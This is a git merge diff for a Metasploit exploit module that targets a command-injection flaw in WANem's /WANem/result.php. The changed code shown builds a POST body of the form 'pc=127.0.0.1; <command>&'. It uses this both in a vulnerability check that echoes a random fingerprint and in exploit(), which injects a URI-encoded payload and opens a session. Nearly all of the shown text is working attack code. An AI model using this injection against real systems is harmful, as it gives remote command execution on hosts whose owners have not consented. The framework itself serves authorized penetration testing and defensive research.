Merge branch 'wanem_exec_improve' of https://github.com/jvazquez-r7/metasploit-framework into jvazquez-r7-wanem_exec_improve

Author: sinn3r

modules/exploits/linux/http/wanem_exec.rb

@@ -25,7 +25,6 @@ def initialize(info = {})
 				and vulnerable to command execution in argument one.
 			},
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 1 $',
 			'Privileged'     => true,
 			'Platform'       => 'unix',
 			'Arch'           => ARCH_CMD,
@@ -42,7 +41,7 @@ def initialize(info = {})
 			'Payload'        =>
 				{
 					'Space'       => 1024,
-					'BadChars'    => "\x00",
+					'BadChars'    => "\x00\x22\x27",
 					'DisableNops' => true,
 					'Compat'      =>
 						{
@@ -68,24 +67,35 @@ def on_new_session(client)
 	end
 
 	def check
+		@peer = "#{rhost}:#{rport}"
+		fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+		data  = "pc=127.0.0.1; "
+		data << Rex::Text.uri_encode("echo #{fingerprint}")
+		data << "%26"
+		print_status("#{@peer} - Sending check")
 
-		res   = send_request_cgi({
-			'method' => 'GET',
-			'uri'    => '/WANem/result.php'
-		})
-		if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
-			return Exploit::CheckCode::Appears
+		begin
+			res = send_request_cgi({
+				'uri'    => '/WANem/result.php',
+				'method' => 'POST',
+				'data'   => data
+			}, 25)
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+			print_error("#{@peer} - Connection failed")
+			return Exploit::CheckCode::Unknown
+		end
+
+		if res and res.code == 200 and res.body =~ /#{fingerprint}/
+			return Exploit::CheckCode::Vulnerable
 		else
 			return Exploit::CheckCode::Safe
 		end
-
 	end
 
 	def exploit
-
 		@peer = "#{rhost}:#{rport}"
 		data  = "pc=127.0.0.1; "
-		data << URI.encode(payload.raw)
+		data << Rex::Text.uri_encode(payload.raw)
 		data << "%26"
 		print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
 		begin